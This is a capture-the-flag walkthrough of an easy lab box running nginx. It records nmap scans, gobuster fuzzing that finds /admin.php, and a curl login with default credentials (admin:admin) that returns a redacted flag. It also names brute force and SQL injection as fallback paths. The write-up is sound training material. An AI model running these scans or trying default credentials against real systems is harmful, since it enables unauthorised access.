Machine / Machines

Walkthrough — <TARGET> (Easy / Starting Point)

By Jennofrie Daguil · Cybersecurity and Red Team Operator

Linux box running nginx 1.14.2 with a PHP admin login page at /admin.php. Default credentials admin:admin yield the flag immediately. No shell access or privilege escalation required -- this is a single-flag Starting Point machine. Result: Port 80/tcp open...

EasyPublished 2026-06-11Sanitized local writeup

Scenario

Walkthrough — <TARGET> (Easy / Starting Point) attack path

Linux box running nginx 1.14.2 with a PHP admin login page at /admin.php. Default credentials admin:admin yield the proof immediately. No shell access or privilege escalation required -- this is a single-proof Starting Point machine. Result: Port 80/tcp open...

Objective

Machine walkthrough focused on Machines evidence, validation, and reusable operator lessons.

Walkthrough — <TARGET> (Easy / Starting Point) sanitized attack graph

Walkthrough flow

01

Open services: HTTP 80 (nginx 1.14.2)

02

Findings: /admin.php login form (POST, fields:...

03

Most likely path: Default credentials (admin:admin)

04

Backup path: Brute force, SQL injection on login form

05

nmap -sC -sV to port 80 open (nginx 1.14.2)

Source coverage

Moderate source coverage

Status: partial. This article is generated from 2 sanitized Markdown sources and keeps raw flags, credentials, keys, cookies, and reusable secrets out of the rendered blog.

57% coverage
Evidence verdict

Moderate confidence: the page is useful for review, but it should be treated as partial because the available source material is thinner or less narrative-complete.

  • <TARGET>-Preignition/walkthrough.md
  • HTB/<TARGET>-Preignition/notes.md

Technical Walkthrough

Walkthrough — <TARGET> (Easy / Starting Point)

Summary

Linux box running nginx 1.14.2 with a PHP admin login page at /admin.php. Default credentials admin:admin yield the flag immediately. No shell access or privilege escalation required -- this is a single-flag Starting Point machine.

Enumeration

Port Scan

bash
nmap -sC -sV -oN nmap/initial <TARGET>

Result: Port 80/tcp open (nginx 1.14.2, default welcome page). Port 3690 filtered (SVN, inaccessible).

Full TCP Scan

bash
nmap -p<redacted> --min-rate 5000 -oN nmap/allports <TARGET>

Result: Confirmed only port 80 is open. All other ports filtered (transient/firewall).

Web Enumeration

bash
gobuster dir -u http://<TARGET>/ -w /usr/share/wordlists/dirb/common.txt -t 30

Result: /admin.php (Status 200, Size 999)

Quick Win Checks

  • robots.txt: 404
  • .git/HEAD: 404
  • sitemap.xml: 404

Admin Page Analysis

bash
curl -s http://<TARGET>/admin.php

Simple login form: POST to self, fields username and password. No CSRF token, no JavaScript validation. Uses W3.CSS styling.

Exploitation

Default Credentials

bash
curl -s -d 'username=admin&password: <redacted>' http://<TARGET>/admin.php

Result: Immediate success.

Flag: <hash redacted>

Lessons Learned

  1. Always try default credentials first on Easy/Starting Point boxes before anything else.
  2. admin:admin is the most common default credential pair in CTF contexts.
  3. The only real enumeration needed was finding the /admin.php endpoint via directory fuzzing.
  4. Total solve time: approximately 3 minutes from first scan to flag.

Artifacts

  • nmap/initial — Initial service scan
  • nmap/allports — Full TCP port scan
  • enum/gobuster.txt — Directory fuzzing results
  • loot/flag.txt — Captured flag
  • loot/admin-response.html — Full HTTP response containing the flag

Source-Backed Dossier

The sections below are merged from companion Markdown notes for the same case. They are rendered after sanitization so the article stays precise without publishing raw flags, credentials, or target-specific secrets.

Notes

Scope

  • Target: <TARGET> (Linux, Easy / Starting Point)
  • Attacker VPN IP: <TARGET>
  • Pwnbox: x08@<TARGET>
  • Date: 2026-05-05
  • Timebox: 45-60 min target
  • Solve time: ~3 minutes

Phase 0 — Setup

  • [x] Workspace created
  • [x] Pwnbox SSH verified
  • [x] Target reachable (ping OK, TTL 63 -> Linux)

Phase 1 — Recon

  • Port 80/tcp open — nginx 1.14.2 (default welcome page)
  • Port 3690/tcp filtered — SVN (not accessible)
  • Full port scan: only port 80 truly open, all others filtered/noise
  • No robots.txt, .git, or sitemap

Directory Fuzzing

  • /admin.php (200, 999 bytes) — login form with username/password fields

Phase 2 — Research

  • Not needed. Default creds first on Easy box.

Phase 3 — Synthesis

  1. Open services: HTTP 80 (nginx 1.14.2)
  2. Findings: /admin.php login form (POST, fields: username, password)
  3. Most likely path: Default credentials (admin:admin)
  4. Backup path: Brute force, SQL injection on login form

Phase 4 — Foothold / Flag

  • admin:admin returned the flag on first attempt
  • Flag: <hash redacted>

Phase 5 — Privesc

  • Not applicable (Starting Point — single flag)

Command Log

text
nmap -sC -sV <TARGET>         -> port 80 open (nginx 1.14.2)
nmap -p<redacted> --min-rate 5000            -> confirmed only port 80 truly open
gobuster dir -w common.txt          -> /admin.php found
curl -d 'username=admin&password: <redacted>' http://<TARGET>/admin.php -> FLAG

Related insights

MachinesArchetype Walkthrough - HTB Starting PointMachinesBaseMachinesBase